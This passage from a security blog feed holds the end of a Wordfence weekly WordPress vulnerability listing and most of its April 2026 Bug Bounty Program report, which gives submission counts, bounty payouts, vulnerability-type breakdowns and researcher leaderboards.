<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaypricing" target="_blank" rel="noopener">YayPricing – WooCommerce Dynamic Pricing &amp; Discounts</a> <span class="wfvr-software-slug">[yaypricing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/k-sorrachat" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1cc663e2f3efb377e8165cec61197c25.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1cc663e2f3efb377e8165cec61197c25"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/k-sorrachat" target="_blank" rel="noopener">K. Sorrachat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d7a544b-73a1-4883-a2d2-df42de08ff08" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60c57b6c-4dc1-4fa6-bf14-7c5c74c704db" target="_blank" rel="noopener">ЮKassa для WooCommerce &lt;= 2.16.1 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65434" target="_blank" rel="noopener noreferrer">							CVE-2026-65434						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yookassa" target="_blank" rel="noopener">ЮKassa для WooCommerce</a> <span class="wfvr-software-slug">[yookassa]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60c57b6c-4dc1-4fa6-bf14-7c5c74c704db" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c9214d-45d4-4477-8244-7802a4901114" target="_blank" rel="noopener">Media Cleaner: Clean your WordPress! &lt;= 7.0.3 &#8211; Authenticated (Administrator+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">4.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4912" target="_blank" rel="noopener noreferrer">							CVE-2026-4912						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-cleaner" target="_blank" rel="noopener">Media Cleaner: Clean your WordPress!</a> <span class="wfvr-software-slug">[media-cleaner]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/495f7dc5e65ef9d4606321be8446eb13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="495f7dc5e65ef9d4606321be8446eb13"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener">lucsob</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c9214d-45d4-4477-8244-7802a4901114" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-27-2026-to-august-2-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (July 27, 2026 to August 2, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Bug Bounty Program Monthly Report – April 2026</title>
		<link>https://swiftupdates.ca/wordfence-bug-bounty-program-monthly-report-april-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Fri, 31 Jul 2026 20:39:58 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-bug-bounty-program-monthly-report-april-2026/</guid>

					<description><![CDATA[In April 2026, the Wordfence Bug Bounty Program received 1288 vulnerability submissions from our growing community of security researchers working to improve the overall security posture of the WordPress ecosystem. These submissions are reviewed, triaged, and processed by the Wordfence Threat Intelligence team, with validated vulnerabilities responsibly disclosed to vendors, often through the Wordfence Vulnerability [&#8230;]]]></description>
										<content:encoded><![CDATA[<div>
<p>In April 2026, the Wordfence Bug Bounty Program received 1288 vulnerability submissions from our growing community of security researchers working to improve the overall security posture of the WordPress ecosystem. These submissions are reviewed, triaged, and processed by the Wordfence Threat Intelligence team, with validated vulnerabilities responsibly disclosed to vendors, often through the <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Wordfence Vulnerability Management Portal – a free service for all WordPress vendors</a>, and protected through the <a href="https://www.wordfence.com/products/" target="_blank" rel="noopener">Wordfence Firewall</a> where appropriate.</p>
<p>Our mission with the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Wordfence Bug Bounty Program</a> is to engage the broader security community in identifying and responsibly disclosing vulnerabilities in WordPress plugins and themes, so we can work with vendors to get them patched before attackers discover them. This collaborative effort enables Wordfence to accelerate patch adoption, provide early protection to millions of websites, and ensure that high-quality vulnerability intelligence reaches the WordPress ecosystem as efficiently as possible. It also ensures that we are able to remediate vulnerabilities before attackers are able to discover them and start exploiting them. <strong>That is why we reward researchers for valid submissions, and why we remain committed to processing every report with transparency, accuracy, and urgency.</strong></p>
<div>
<p><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> Join the Wordfence Bug Bounty Program</strong></p>
<hr>
<p>Help secure the WordPress ecosystem while earning rewards for your security research.</p>
<p>We’re actively seeking skilled researchers to identify vulnerabilities in WordPress plugins and themes, with prompt payments and transparent processes.</p>
<div><a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Start Your Security Research Journey</a></div>
</div>
<p>As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">most comprehensive and highest-quality</a> WordPress vulnerability program, the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Wordfence Bug Bounty Program</a> plays a critical role in helping site owners, developers, and hosting providers stay ahead of emerging threats at all stages of the open source lifecycle.</p>
<p>In this report, we highlight key metrics of the Bug Bounty Program from April 2026, recognize the researchers contributing to WordPress security, and provide insight into the vulnerabilities uncovered and addressed.</p>
<table role="table" aria-label="Data table">
<thead>
<tr>
<th scope="col">Table of Contents</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/#program-submission-highlights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4ca.png" alt="&#x1f4ca;" class="wp-smiley"> Program Submission Highlights – April 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/#submission-insights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> WordPress Software Vulnerability Submission Insights – April 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/#bounty-insights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4b0.png" alt="&#x1f4b0;" class="wp-smiley"> Bounty Insights – April 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/#top-researchers" target="_blank" rel="noopener"> <img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f31f.png" alt="&#x1f31f;" class="wp-smiley"> Top WordPress Security Researchers – April 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/#current-promotions" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4e3.png" alt="&#x1f4e3;" class="wp-smiley"> Current WordPress Bug Bounty Program Promotions</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/#critical-highlights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f526.png" alt="&#x1f526;" class="wp-smiley"> Critical WordPress Software Vulnerability Highlights – April 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/07/wordfence-bug-bounty-program-monthly-report-april-2026/#conclusion" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4dd.png" alt="&#x1f4dd;" class="wp-smiley"> Conclusion</a></td>
</tr>
</tbody>
</table>
<p> </p>
<p>If you’re interested in joining the program or learning more about how we responsibly manage disclosures and protect WordPress users, visit the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a> page.</p>
</div>
<div>
<div>
<p><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> WordPress Software Vendors – Sign Up For Free Centralized Management of all Vulnerabilities in Your Software</strong></p>
<hr>
<p>Wordfence provides a completely free vulnerability management portal for WordPress Software vendors to easily track and manage all vulnerabilities submitted to the Wordfence Bug Bounty Program, and added to the Wordfence Intelligence Vulnerability Database.</p>
<p>This portal streamlines and enhances the repsonsible disclosure process so you can secure your customers faster.</p>
<div><a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Get Started With the Vendor Portal Today</a></div>
</div>
<p> </p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4ca.png" alt="&#x1f4ca;" class="wp-smiley"> Program Submission Highlights – April 2026</h2>
<p>The Wordfence Bug Bounty Program is designed for momentum: rapid triage of critical issues, clear feedback, and fast, fair rewards. Each submission moves through our standardized workflow of validation, vendor coordination, patch verification, and firewall coverage where applicable, so research translates into real-world protection quickly.</p>
<div>
<p><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6e1.png" alt="&#x1f6e1;" class="wp-smiley"> Real-Time Protection Impact</strong></p>
<hr>
<p>Every vulnerability disclosed through this program is a threat <strong>you</strong> don’t have to face blindly. Our researchers uncover and report vulnerabilities <strong>before</strong> they can be exploited, and <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a> and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> users get protection in real-time through our firewall. Free users are protected in 30 days.</p>
</div>
<p>Behind the numbers is meaningful impact for site owners. The issues surfaced here inform new firewall rules, strengthen our detection logic, and help vendors ship safer releases. If you’re new to bounty hunting, this is a great place to start: we publish scope clearly, pay promptly, and credit the work that keeps WordPress secure.</p>
<div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4c8.png" alt="&#x1f4c8;" class="wp-smiley"></div>
<h3>Total Submissions</h3>
</div>
<div>1288</div>
<div><span>-25.0% from last month</span></div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f465.png" alt="&#x1f465;" class="wp-smiley"></div>
<h3>Active Researchers</h3>
</div>
<div>327</div>
<div><span>+1.9% from last month</span></div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"></div>
<h3>High Threat</h3>
</div>
<div>52</div>
<div><span>-7.1% from last month</span></div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="&#x26a0;" class="wp-smiley"></div>
<h3>Common &amp; Dangerous</h3>
</div>
<div>51</div>
<div><span>-34.6% from last month</span></div>
</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6e1.png" alt="&#x1f6e1;" class="wp-smiley"></div>
<h3>WAF Rules Released</h3>
</div>
<div>3</div>
<div><span>-40.0% from last month</span></div>
</div>
<p> </p>
<h4><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f3af.png" alt="&#x1f3af;" class="wp-smiley"> Vulnerability Focus Areas</h4>
<hr>
<ul>
<li><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> High Threat Vulnerabilities:</strong> Issues that could result in full site compromise, such as Arbitrary File Uploads or Remote Code Execution. Must be exploitable by unauthenticated or low-level authenticated attackers with software having 25+ active installations.</li>
<li><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="&#x26a0;" class="wp-smiley"> Common &amp; Dangerous:</strong> Stored Cross-Site Scripting and SQL Injection vulnerabilities exploitable by unauthenticated or low-level authenticated attackers. Software must have 500+ active installations.</li>
</ul>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4b0.png" alt="&#x1f4b0;" class="wp-smiley"> Bounty Insights – April 2026</h2>
<p>Our research powers real investment back into the community. This section totals bounties and bonuses paid for the month and showcases standout findings. Our philosophy is simple: reward high-quality, responsibly disclosed research that measurably reduces risk for WordPress users.</p>
<div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4b0.png" alt="&#x1f4b0;" class="wp-smiley"></div>
<h3>Total Bounties Awarded</h3>
</div>
<div>$37,054</div>
<div>April 2026</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4ca.png" alt="&#x1f4ca;" class="wp-smiley"></div>
<h3>Average Bounty Per Submission</h3>
</div>
<div>$205.86</div>
<div>Per validated in-scope submission</div>
</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f3c6.png" alt="&#x1f3c6;" class="wp-smiley"></div>
<h3>Highest Single Bounty</h3>
</div>
<div>$4,914</div>
<div>Top researcher reward</div>
</div>
<hr>
<h3>Top 5 Bounties Awarded</h3>
<div>
<table role="table" aria-label="Top 5 Bounties Awarded">
<thead>
<tr>
<th scope="col">Vulnerability</th>
<th scope="col">Bounty</th>
<th scope="col">Install Count</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/a2e802a6-d2f1-47cc-883a-89110e569168" target="_blank" rel="noopener">Slider Revolution 7.0.0 – 7.0.10 – Authenticated (Subscriber+) Arbitrary File Upload via _get_media_url</a></td>
<td>$4,914.00</td>
<td>5000000</td>
</tr>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/5dc72d78-d47c-4b36-8d69-8672e15ddf8c" target="_blank" rel="noopener">Avada (Fusion) Builder &lt;= 3.15.2 – Unauthenticated Remote Code Execution via PHP Function Injection via ‘render_logics’ Shortcode Attribute via Widget AJAX Handler</a></td>
<td>$2,600.00</td>
<td>968000</td>
</tr>
<tr>
<td>Unauthenticated Arbitrary File Upload (In Disclosure)</td>
<td>$1,300.00</td>
<td>30000</td>
</tr>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/123e1758-3384-4ea7-96dd-d6adcce40392" target="_blank" rel="noopener">Frontend Admin by DynamiApps &lt;= 3.29.2 – Unauthenticated Privilege Escalation via Form Configuration Injection</a></td>
<td>$975.00</td>
<td>9000</td>
</tr>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/4f57cac9-5610-454b-affb-86384ea00881" target="_blank" rel="noopener">Slider Revolution 7.0 – 7.0.10 – Authenticated (Subscriber+) Sensitive Information Disclosure</a></td>
<td>$960.00</td>
<td>5000000</td>
</tr>
</tbody>
</table>
</div>
<p>Want to earn more? Read the scope carefully, target high-threat classes, and include clear reproduction steps with proof of impact. We pay promptly on validated issues, and bonus multipliers may apply during limited-time promotions and challenges.</p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> WordPress Software Vulnerability Submission Insights – April 2026</h2>
<p>This section breaks down how reports map to our program outcomes. What’s in scope, what isn’t, and where the highest security impact typically sits. We highlight the most common in-scope vulnerability classes and the categories that yielded the largest rewards so researchers can focus their efforts where they matter most.</p>
<p>Authentication level and exploit preconditions drive risk and reward through our program. Unauthenticated and low-privilege paths tend to have outsized impact because they scale to more real-world compromise. Use these insights to prioritize your testing strategy and maximize both security value and bounty potential.</p>
<hr>
<h3>Total Number of Vulnerabilities Considered In Scope, Out of Scope, Rejected, or Duplicate</h3>
<div>
<table role="table" aria-label="Submission Breakdown">
<thead>
<tr>
<th scope="col">In Scope</th>
<th scope="col">Out of Scope</th>
<th scope="col">Rejected</th>
<th scope="col">Duplicate</th>
</tr>
</thead>
<tbody>
<tr>
<td>180</td>
<td>165</td>
<td>572</td>
<td>371</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Top 10 Most Commonly Submitted In-Scope Vulnerability Types</h3>
<p>The most frequently submitted vulnerability types highlight current testing focus areas across the researcher community. These patterns often reflect both ease of discovery and prevalence in the WordPress ecosystem.</p>
<div>
<table role="table" aria-label="Top 10 Vulnerabilities by Submissions">
<thead>
<tr>
<th scope="col">Vulnerability Type</th>
<th scope="col">Total Submissions</th>
<th scope="col">Total Rewards</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>CWE 79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)</td>
<td>64</td>
<td>$5,600.00</td>
<td>$87.50</td>
</tr>
<tr>
<td>CWE 862: Missing Authorization</td>
<td>12</td>
<td>$1,245.00</td>
<td>$103.75</td>
</tr>
<tr>
<td>CWE 269: Improper Privilege Management</td>
<td>11</td>
<td>$4,335.00</td>
<td>$394.09</td>
</tr>
<tr>
<td>CWE 89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)</td>
<td>11</td>
<td>$1,228.00</td>
<td>$111.64</td>
</tr>
<tr>
<td>CWE 22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)</td>
<td>9</td>
<td>$2,491.00</td>
<td>$276.78</td>
</tr>
<tr>
<td>CWE 639: Authorization Bypass Through User-Controlled Key</td>
<td>8</td>
<td>$252.00</td>
<td>$31.50</td>
</tr>
<tr>
<td>CWE 434: Unrestricted Upload of File with Dangerous Type</td>
<td>6</td>
<td>$8,116.00</td>
<td>$1,352.67</td>
</tr>
<tr>
<td>CWE 266: Incorrect Privilege Assignment</td>
<td>4</td>
<td>$1,073.00</td>
<td>$268.25</td>
</tr>
<tr>
<td>CWE 640: Weak Password Recovery Mechanism for Forgotten Password</td>
<td>4</td>
<td>$1,360.00</td>
<td>$340.00</td>
</tr>
<tr>
<td>CWE 287: Improper Authentication</td>
<td>3</td>
<td>$894.00</td>
<td>$298.00</td>
</tr>
</tbody>
</table>
</div>
<p> </p>
<hr>
<h3>Top 10 Highest Rewarded In-Scope Vulnerability Types</h3>
<p>While some vulnerabilities appear frequently, others command premium rewards. This breakdown shows which vulnerability classes generated the highest total payouts across all submissions in those categories, indicating both severity and exploitability value.</p>
<div>
<table role="table" aria-label="Top 10 Vulnerabilities by Bounties">
<thead>
<tr>
<th scope="col">Vulnerability Type</th>
<th scope="col">Total Rewards</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>CWE 434: Unrestricted Upload of File with Dangerous Type</td>
<td>$8,116.00</td>
<td>6</td>
<td>$1,352.67</td>
</tr>
<tr>
<td>CWE 79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)</td>
<td>$5,600.00</td>
<td>64</td>
<td>$87.50</td>
</tr>
<tr>
<td>CWE 269: Improper Privilege Management</td>
<td>$4,335.00</td>
<td>11</td>
<td>$394.09</td>
</tr>
<tr>
<td>CWE 74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)</td>
<td>$2,600.00</td>
<td>1</td>
<td>$2,600.00</td>
</tr>
<tr>
<td>CWE 22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)</td>
<td>$2,491.00</td>
<td>9</td>
<td>$276.78</td>
</tr>
<tr>
<td>CWE 640: Weak Password Recovery Mechanism for Forgotten Password</td>
<td>$1,360.00</td>
<td>4</td>
<td>$340.00</td>
</tr>
<tr>
<td>CWE 502: Deserialization of Untrusted Data</td>
<td>$1,338.00</td>
<td>3</td>
<td>$446.00</td>
</tr>
<tr>
<td>CWE 862: Missing Authorization</td>
<td>$1,245.00</td>
<td>12</td>
<td>$103.75</td>
</tr>
<tr>
<td>CWE 89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)</td>
<td>$1,228.00</td>
<td>11</td>
<td>$111.64</td>
</tr>
<tr>
<td>CWE 266: Incorrect Privilege Assignment</td>
<td>$1,073.00</td>
<td>4</td>
<td>$268.25</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>In-Scope Vulnerability Distribution by Authentication Level</h3>
<p>Authentication requirements directly impact real-world exploitability. Unauthenticated and subscriber-level vulnerabilities typically pose greater risk, reflected in both our prioritization and reward structure.</p>
<div>
<table role="table" aria-label="Vulnerability Distribution by Auth Level">
<thead>
<tr>
<th scope="col">Authentication Level</th>
<th scope="col">Total Vulnerabilities</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>Unauthenticated</td>
<td>81</td>
<td>$253.59</td>
</tr>
<tr>
<td>Contributor</td>
<td>33</td>
<td>$101.87</td>
</tr>
<tr>
<td>Subscriber</td>
<td>32</td>
<td>$418.83</td>
</tr>
<tr>
<td>Author</td>
<td>12</td>
<td>$143.75</td>
</tr>
<tr>
<td>Custom</td>
<td>7</td>
<td>$117.50</td>
</tr>
<tr>
<td>Unauthenticated – UI Required</td>
<td>5</td>
<td>$161.60</td>
</tr>
</tbody>
</table>
</div>
<p> </p>
<hr>
<h3>Vulnerability Submission Install Count Spread</h3>
<p>Install counts help us gauge <strong>blast radius</strong>. Higher install bases can move a finding into higher priority and often correlate with stronger payouts, while smaller-but-critical ecosystems still qualify when the exploitability and impact warrant it.</p>
<div>
<table role="table" aria-label="Vulnerability Install Count Spread">
<thead>
<tr>
<th scope="col">Install Range</th>
<th scope="col">Total Vulnerabilities</th>
<th scope="col">Average CVSS</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>1,000–49,999</td>
<td>65</td>
<td>7.63</td>
<td>$170.98</td>
</tr>
<tr>
<td>100,000–999,999</td>
<td>46</td>
<td>6.26</td>
<td>$349.17</td>
</tr>
<tr>
<td>50,000–99,999</td>
<td>30</td>
<td>6.34</td>
<td>$93.93</td>
</tr>
<tr>
<td>Off-Repo</td>
<td>22</td>
<td>8.05</td>
<td>$207.28</td>
</tr>
<tr>
<td>5,000,000+</td>
<td>6</td>
<td>6.26</td>
<td>$1,416.40</td>
</tr>
<tr>
<td>1,000,000–4,999,999</td>
<td>4</td>
<td>7.60</td>
<td>$456.50</td>
</tr>
<tr>
<td>500–999</td>
<td>3</td>
<td>6.70</td>
<td>$10.67</td>
</tr>
<tr>
<td>0–499</td>
<td>2</td>
<td>8.65</td>
<td>$33.00</td>
</tr>
</tbody>
</table>
</div>
<p> </p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f31f.png" alt="&#x1f31f;" class="wp-smiley">Top WordPress Security Researchers – April 2026</h2>
<p>Security is a team sport, and this leaderboard celebrates the people raising the bar. We recognize contributors by valid in-scope submissions, overall earnings, and average severity to highlight different paths to excellence.</p>
<hr>
<h3>Top 5 Researchers based on Volume of In-Scope Submissions</h3>
<p>Volume leaders demonstrate consistent vulnerability discovery across diverse targets. These researchers excel at systematic testing and maintaining high validation rates.</p>
<div>
<table role="table" aria-label="Top 5 Researchers by Submissions">
<thead>
<tr>
<th scope="col">Researcher</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/2016" target="_blank" rel="noopener">Rafie Muhammad</a></td>
<td>14</td>
<td>$266.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6487" target="_blank" rel="noopener">lhking</a></td>
<td>9</td>
<td>$369.22</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5701" target="_blank" rel="noopener">Nguyen Ngoc Duc (duc193)</a></td>
<td>7</td>
<td>$376.14</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/2340" target="_blank" rel="noopener">Webbernaut</a></td>
<td>6</td>
<td>$248.67</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5743" target="_blank" rel="noopener">h0xilo</a></td>
<td>6</td>
<td>$1,161.00</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Top 5 Researchers Based on Average CVSS of In-Scope Submissions</h3>
<p>Quality over quantity defines these researchers who consistently identify high-severity vulnerabilities. Their average CVSS scores reflect expertise in finding critical security gaps.</p>
<div>
<table role="table" aria-label="Top 5 Researchers by CVSS">
<thead>
<tr>
<th scope="col">Researcher</th>
<th scope="col">Average CVSS</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/3226" target="_blank" rel="noopener">Ankit Patel</a></td>
<td>9.80</td>
<td>1</td>
<td>$195.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5700" target="_blank" rel="noopener">bashu</a></td>
<td>9.80</td>
<td>1</td>
<td>$325.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5773" target="_blank" rel="noopener">snr</a></td>
<td>9.80</td>
<td>1</td>
<td>$33.00</td>
</tr>
<tr>
